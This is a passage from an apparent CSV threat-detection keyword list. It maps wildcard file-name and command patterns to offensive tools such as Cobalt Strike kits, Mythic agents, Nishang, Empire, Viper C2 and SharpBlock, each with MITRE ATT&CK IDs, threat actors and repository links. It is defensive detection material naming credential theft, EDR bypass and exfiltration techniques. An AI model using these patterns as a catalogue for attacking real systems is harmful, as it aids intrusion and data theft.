T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*execute-assembly *asreproast*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*execute-assembly *kerberoast*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*execute-assembly SharpBlock*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" +"*execute-assembly*Seatbelt*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*execute-assembly*sharpcookiemonster*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" +"*execute-assembly*sigflip*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*ExecuteAssembly.*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*executeAssembly.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*execute-assembly.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Execute-Command-MSSQL*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Execute-DNSTXT-Code*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*execute-dotnet-assembly*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*execute-pe.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*executepersistence*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*execute-Pezor*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*execute-shellcode.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*Execution_CommandAndScriptingInterpreter_UploadAndExec.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_CallbackCreateThreadpoolWait.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_CallbackCreateTimerQueue.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_CallbackEnumChildWindows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_CallbackEnumWindows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_DirectConnectReverseHTTPS.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_DirectConnectReverseTCPRc4.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_FakePPID.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_LinuxBaseShellcodeLoader.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_LinuxSelfGuardLoader.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_NtCreateSection.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_Syscall_inject.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_VSSyscallProject.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*-ExecutionPolicy Bypass -File Win10.ps1 *","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*-ExecutionPolicy Bypass -File Win11.ps1 *","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*exegol4thewin*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ExegolController.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*exegol-docker-build*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ExegolExceptions.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Exegol-images-main*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ExegolManager.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ExegolProgress.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ExegolPrompt.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ExeStager.csproj*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*ExeToInjectInTo.*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*ExeToLaunch StringToBePutAsCmdline*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*ExetoText.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*ExfilDataToGitHub*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ExfilDataToGitHub.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ExfilDataToGitHub*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1140","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exfil-EC266392-D6BC-4F7B-A4D1-410166D30B55.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*exfiltrate_via_post.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*Exfiltration from DNS finished!*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*Exfiltration from HTTPS finished!*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 